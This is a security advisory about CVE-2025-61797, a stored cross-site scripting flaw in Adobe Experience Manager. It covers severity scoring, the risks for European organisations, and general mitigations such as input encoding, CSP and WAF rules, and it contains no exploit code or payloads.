CVE-2025-61797 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, affecting Adobe Experience Manager (AEM) versions 11.6 and earlier. The vulnerability allows a low-privileged attacker to inject malicious JavaScript code into form fields that are not properly sanitized or escaped. When a victim user visits a page containing the injected script, the malicious code executes in their browser context, potentially leading to theft of session cookies, user credentials, or other sensitive information accessible via the browser. The attack requires the victim to interact with a crafted malicious link, indicating user interaction is necessary for exploitation. The vulnerability changes the security scope, meaning the impact can extend beyond the attacker’s privileges. The CVSS 3.1 base score is 5.4, reflecting medium severity with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, indicating network attack vector, low attack complexity, low privileges required, user interaction required, scope changed, and limited confidentiality and integrity impact without availability impact. No patches or known exploits are currently reported, but the vulnerability poses a risk to organizations relying on AEM for web content management, especially those exposing user input forms. Attackers could leverage this vulnerability to perform targeted attacks such as session hijacking or delivering further malware payloads via the victim’s browser.

For European organizations, the impact of CVE-2025-61797 can be significant, especially for those using Adobe Experience Manager to manage public-facing websites or intranet portals. Exploitation could lead to unauthorized access to user sessions, theft of sensitive data, or manipulation of web content integrity. This can damage organizational reputation, lead to data breaches involving personal data protected under GDPR, and disrupt business operations reliant on trusted digital experiences. Since the vulnerability requires user interaction, phishing or social engineering campaigns could be used to increase exploitation success. The medium severity score reflects moderate risk, but the scope change and potential for lateral impact within affected systems elevate the concern. Organizations in sectors such as finance, government, healthcare, and media, which often use AEM for digital content delivery, are particularly vulnerable. Failure to address this vulnerability could result in regulatory penalties and loss of customer trust.

To mitigate CVE-2025-61797, organizations should prioritize updating Adobe Experience Manager to a version where this vulnerability is patched once available. In the absence of an immediate patch, implement strict input validation and output encoding on all user-supplied data in form fields to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. Conduct regular security audits and penetration testing focusing on XSS vulnerabilities in AEM deployments. Educate users about the risks of clicking on suspicious links to reduce successful exploitation via social engineering. Monitor web server and application logs for unusual input patterns or error messages indicating attempted exploitation. Consider deploying Web Application Firewalls (WAF) with rules tuned to detect and block XSS payloads targeting AEM. Finally, segment and restrict access to AEM administrative interfaces to minimize the impact of compromised low-privileged accounts.